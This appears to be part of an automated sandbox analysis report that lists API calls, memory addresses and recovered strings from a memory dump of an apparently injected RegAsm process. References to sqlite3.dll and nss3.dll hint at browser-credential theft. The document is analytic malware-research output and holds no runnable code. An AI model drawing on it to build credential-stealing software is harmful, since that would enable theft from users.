                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                • String ID: </%s>
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                                                Strings
                                                                                                                                                                                • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                                                • String ID: recovered %d pages from %s
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _ultoasprintf
                                                                                                                                                                                • String ID: %s %s %s
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00409919
                                                                                                                                                                                • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                                                • String ID: N\@
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                • String ID: menu_%d
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _msizerealloc
                                                                                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                                                • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                                                APIs
                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                • String ID: sqlite3.dll
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileString
                                                                                                                                                                                • String ID: A4@$Server Details
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                • free.MSVCRT ref: 0040799A
                                                                                                                                                                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                  • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                  • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                • free.MSVCRT ref: 004079BD
                                                                                                                                                                                • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                • String ID: